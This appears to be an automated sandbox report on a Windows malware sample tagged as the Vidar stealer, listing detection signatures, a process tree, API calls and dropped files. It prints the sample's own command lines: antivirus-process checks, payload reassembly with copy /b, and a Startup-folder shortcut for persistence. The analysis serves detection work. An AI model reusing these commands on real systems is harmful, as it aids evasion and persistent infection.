Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ldqj18tn.exe

Overview

General Information

Sample name:ldqj18tn.exe
Analysis ID:1577511
MD5:574ab8397d011243cb52bef069bad2dc
SHA1:1e1cf543bb08113fec19f9d5b9c1df25ed9232f6
SHA256:b376d8b2108027a42534314eb5d82a70b06984c7dca8e91df66d00f5c6e91f20
Tags:18521511316185215113209bulletproofexeVidaruser-abus3reports
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • ldqj18tn.exe (PID: 8140 cmdline: "C:\Users\user\Desktop\ldqj18tn.exe" MD5: 574AB8397D011243CB52BEF069BAD2DC)
    • cmd.exe (PID: 7460 cmdline: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7576 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7564 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1244 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7852 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5612 cmdline: cmd /c md 704579 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7068 cmdline: findstr /V "MARTNMSPIDERRINGTONE" Mh MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1672 cmdline: cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Organizational.pif (PID: 3488 cmdline: Organizational.pif u MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 5844 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7556 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 7400 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • InnoMesh.scr (PID: 1704 cmdline: "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , ProcessId: 7400, ProcessName: wscript.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Organizational.pif u, CommandLine: Organizational.pif u, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: Organizational.pif u, ProcessId: 3488, ProcessName: Organizational.pif
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ldqj18tn.exe", ParentImage: C:\Users\user\Desktop\ldqj18tn.exe, ParentProcessId: 8140, ParentProcessName: ldqj18tn.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ProcessId: 7460, ProcessName: cmd.exe
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif, ProcessId: 3488, TargetFilename: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" , ProcessId: 7400, ProcessName: wscript.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5844, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 7852, ProcessName: findstr.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ldqj18tn.exeReversingLabs: Detection: 65%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
Source: ldqj18tn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ldqj18tn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002B4005
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_002B494A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002B3CE2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_002BC2FF
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BCD14 FindFirstFileW,FindClose,11_2_002BCD14
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_002BCD9F
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002BF5D8
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002BF735
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_002BFA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00254005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00254005
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_0025494A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0025C2FF
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025CD14 FindFirstFileW,FindClose,17_2_0025CD14
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_0025CD9F
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0025F5D8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0025F735
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0025FA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00253CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00253CE2
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\704579\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\704579Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002C29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_002C29BA
Source: global trafficDNS traffic detected: DNS query: zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq
Source: ldqj18tn.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ldqj18tn.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ldqj18tn.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ldqj18tn.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: ldqj18tn.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ldqj18tn.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ldqj18tn.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ldqj18tn.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ldqj18tn.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: ldqj18tn.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ldqj18tn.exeString found in binary or memory: http://ocsp.digicert.com0
Source: ldqj18tn.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: ldqj18tn.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: ldqj18tn.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000000.1344846466.0000000000319000.00000002.00000001.01000000.00000006.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, InnoMesh.scr, 00000011.00000002.2547902948.00000000002B9000.00000002.00000001.01000000.00000008.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: ldqj18tn.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: InnoMesh.scr.11.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: ldqj18tn.exe, 00000000.00000003.1297854644.000000000295E000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355251151.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002C4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_002C4830
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00264830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00264830
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002C4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_002C4632
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002DD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_002DD164
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0027D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,17_2_0027D164

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Consequence entropy: 7.99851486835Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\International entropy: 7.99645540823Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Becoming entropy: 7.99806240446Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Gently entropy: 7.99676588989Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Estimate entropy: 7.99772169864Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Jet entropy: 7.99726981823Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Commodities entropy: 7.99796353937Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Prof entropy: 7.99639738608Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Against entropy: 7.995142844Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Required entropy: 7.9980527323Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Situations entropy: 7.99712082708Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Mood entropy: 7.99795861068Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Princess entropy: 7.99700719992Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Jessica entropy: 7.99791437325Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Traveller entropy: 7.99707087898Jump to dropped file
Source: C:\Users\user\Desktop\ldqj18tn.exeFile created: C:\Users\user\AppData\Local\Temp\Fastest entropy: 7.99719426565Jump to dropped file
